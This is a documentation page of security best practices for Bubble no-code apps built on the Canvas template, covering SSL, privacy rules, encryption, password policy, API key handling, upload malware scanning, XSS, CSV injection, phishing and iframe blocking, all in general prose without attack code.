Canvas Documentation
Bubble Best Practices
v3.7
v3.7
  • Introduction
  • Key Features
  • What's New
  • For Designers
  • CANVAS FUNCTIONALITY
    • Getting Started
    • Branding & Design
    • Marketing Pages
    • Bubble Pages & Blocks
    • Roles & Permissions
    • Menus & Navigation
    • Data & Workflows
    • Emails & Alerts
    • Miscellaneous
      • Setting up two factor authentication
      • Cookie and consent banner
      • Setting your password policy
      • Set up Payment info on Account page
      • Loading screen
      • Configuring multiple languages
      • Customizing your app's portal page colors
    • Reference
      • Pages
        • Index
        • Admin Portal
        • Account
        • Login
        • Legal
        • Reset Password
        • 404
      • Reusable elements
        • Header
        • Footer
        • Signup & Login
        • Cookies Permission
        • Widgets
          • App security
          • Header Widgets
          • Workflow Widgets
        • Admin Portal
          • Admin analytics
          • Admin email & templates
          • Admin header & footer
          • Admin legal popups
          • Admin branding, launch, and settings
          • Admin marketing pages
          • Admin portal canvas logic
          • Admin options settings
        • Menu Focus Elements
      • Data types
      • Option Sets
      • Backend Workflows
      • Design standards
        • Manually Building UI
  • Bubble Best Practices
    • Learning Bubble Basics
    • Principles
    • Database
    • Design
    • Security
    • SEO
    • Speed
    • Modularity
      • Data triggers
  • Canvas library
    • Page templates
      • Free Bubble Marketing Page
      • Premium Bubble Marketing Page
      • Centered Profile Page
      • Left-Justified Profile Page
      • Standard page
      • Toggle Tabs Page
      • Menu Page
      • Mobile Menu Page
      • Video List Page
      • Standard Portal / Dashboard Page
      • Simple Portal / Dashboard Page with Icons
      • Double Sidebar Portal Page Template
      • Search Page
      • Map Search Page with Toggle and Filters
      • Floating Map Search Page
      • Search Bar Page
      • Multi-Step Page With Progress Bar
      • Standard Multi-Step Process Page
      • Multi-Step Process Page with Sidebar
      • Gallery Profile or Product Page
      • Sidebar Profile Page
      • 2-Column Menu Tabs Page
      • 2-Column Checkout Page
      • 2-Column Video Chat Page
      • Vertical Multi-Step Page Template
    • Blocks
      • Monthly Calendar Scheduling Widget
      • No Reply Comments Thread
      • Nested Comments Thread (with Like and Reply)
      • Placeholder Group
      • List with Circular Progress Bar Repeating Group
      • Top Input Chat Widget
      • Bottom Input Chat Widget
      • Toggle Tabs Group
      • Single-Select or Multi-Select Pill Tabs Group
      • Settings group
      • To-Do List Repeating Group
      • Title Group with Button and Filters
      • Product Details Group With Progress Bar
      • Listing details with Icons and Menu Focus Group
      • Week Daily Availability Group
      • Frequently Asked Questions (FAQ) Repeating Group
      • Dismissible Module
      • Video Group
      • About Group
      • Add to Cart Group
      • Full Width Map with Directions Link
      • Location Module (Map and Directions)
      • Drag and Drop Repeating Group
    • Popups
      • Confirmation Popup
      • Message Popup
      • Image Popup
      • Video Popup
      • Vertical Scroll Popup
      • Edit Popup
      • Standard Form Popup
      • Subscribe Popup
      • Feedback / Contact Popup
      • Details Popup
      • Add List Popup
      • Advanced Form Popup
      • Rating Popup
      • Toggle Tabs Popup
      • Share Popup
      • Multi-Step Popup
      • Invoice Popup
      • Stripe Credit Card Purchase Popup
      • View Profile Popup
      • Send Message Popup
      • Multi-Select Pill Tabs Popup
      • Pricing Plans Popup
Powered by GitBook
On this page
  • Enable SSL
  • Create privacy rules
  • No "paywall" popups
  • Don't store sensitive data in an unencrypted format
  • Set minimum password requirements
  • Don't use private API keys/tokens on the page
  • Forum resource
  • Testing privacy rules
  • Scanning files for malware
  • Risks from plugins and custom code
  • XSS (cross site scripting)
  • CSV injection
  • Unsafe HTML in emails (phishing)
  • Block all iFrames of app

Was this helpful?

  1. Bubble Best Practices

Security

This page lays out best practices when it comes to making your app and your data secure.

PreviousDesignNextSEO

Last updated 3 years ago

Was this helpful?

Enable SSL

SSL ensures that the data transmitted between the server and the browser is encrypted - make sure to set it up by checking the box located in the Settings > Domain/email section of the Bubble Editor.

Create privacy rules

Having robust privacy rules is essential in making sure that your server doesn't set data to a browser that the user is not supposed to see. See ink below for more information about setting those up.

We also have a .

Database / privacy rules

No "paywall" popups

In Bubble, you can create a popup that blocks the user from visually seeing or interacting with the page. However, these popups can be closed relatively easily using Developer Tools in the browser.

To put this in specific "Bubble-ese": you shouldn't rely on a popup with the setting This popup can't be closed by pressing Esc to lock users out of pages.

Don't store sensitive data in an unencrypted format

If your application needs to store very sensitive data, like Social Security numbers, credit card numbers, etc. in encrypted format. Better yet, find another company (like Stripe or Paypal) that can handle these very risky transactions, and integrate them into your app through Bubble plugins or using the API Connector.

Bubble does encrypt all data at rest, which makes data storage and data usage more safe if you have authentication and privacy rules properly set up. But if you've accidentally made your privacy rules more loose than they should be, someone may get a hold of your data. We would recommend encrypting the values that go into those sensitive fields yourself and then decrypting them before they're used.

Set minimum password requirements

Use the Define a password policy functionality found in Settings > General section of the Bubble editor to set the minimum length, capital letter requirements, etc.

We recommend setting a minimum password length of 8 characters and requiring 1 capital letter and 1 number.

Don't use private API keys/tokens on the page

If you need to make an API call that uses a secret key or a token, make sure that it's not populated on any page but is instead in one of these 2 places:

  1. In the API connector, marked as "Private"

  2. In a backend workflow

This will ensure that the user's browser never sees the API key/token.

Forum resource

Testing privacy rules

Scanning files for malware

This will help protect both admin users and standard users - if admins open these files somewhere in the admin portal or are sent these files via email, that would be an issue.

Note that some browsers (e.g. Chrome in Windows) have some built-in file scanning ability as well to prevent downloading files tagged as malware, so there are some built-in protections here for many users.

Risks from plugins and custom code

Using community plugins and custom HTML in your Bubble app carries some inherent security risks with it.

One of those risks is that the plugin developer could be malicious and steal data from you, like by tracking all browsers which load the plugin on the front end.

XSS (cross site scripting)

Another risk is the possibility that plugins will allow raw user data to run javascript in other users' browsers.

Bubble's native elements should all have protections built in to prevent users from executing javascript when users' data is shown to other users. Plugins, however, may not all have this set up. (The Bubble HTML element, of course, is an exception here, as it is intended to be able to include HTML and javascript.)

This is a risk when showing data on the front-end to users - for example, if I have a calendar plugin and I use it to display data from many users to each other, it's possible that one user will enter some executable code in a text field and that the plugin will execute that code when trying to display it. There are many different ways to exploit XSS vulnerabilities, so the specific ways to test this will not be covered here.

CSV injection

For a Bubble-specific guide on how to deal with this bug, see here:

This is a known bug with Canvas' CSV export flow in the admin portal. We've decided to leave this vulnerability there for the moment, as it would add quite a bit of complexity to the app to remove it. All app admins should be made aware of this vulnerability.

Unsafe HTML in emails (phishing)

Emails can be used as a vector to steal user data, user credentials and other sensitive info. This relatively simple attack has been the cause of several high-profile cybersecurity breaches over the past few years.

Block all iFrames of app

If your app allows other websites to display it in an iFrame, then other developers can much more easily impersonate your website or use its content to show on their own websites. Impersonating your website is useful in the case of a phishing attack.

It is okay to allow all iFrames or iFrames from the same origin if your app has a valid reason for doing so and you are aware of the minor risks involved. Otherwise, it's best to block all iFrames of your site.

If you're interested in learning more about how Bubble secures data in general, and some other security recommendations, you can read posted in the Bubble Forum by Josh (Bubble CTO and co-founder).

To test whether privacy rules are set up correctly, it can be helpful to use a web browser's developer tools to examine what data is available to the user.

When users have the ability to upload files to your app that other users can download, ideally they should be scanned for malware. Some API based solutions for this include and . also offers this option along with their file storage service, but is quite pricey.

When allowing for CSVs of user-entered data to be downloaded from an app, programs like Excel will read Formulas that are included in those CSVs. If a user's "About" field has a formula, they can use it to execute programs outside of Excel, or hit APIs and export the app data. More info about the vulnerability here:

l
video walkthrough for Bubble Privacy Rules
https://docs.airdev.co/canvas/using-bubble/database#privacy-rules
these security guidelines from early 2019
Here's a page that shows how to do that with Chrome.
Scanii
Cloudmersive
Filestack
https://owasp.org/www-community/attacks/CSV_Injection
This setting is carries some amount of risk with it
LogoCSV injection preventionFunctionality Reference
LogoXSS stopper + HTML whitelistFunctionality Reference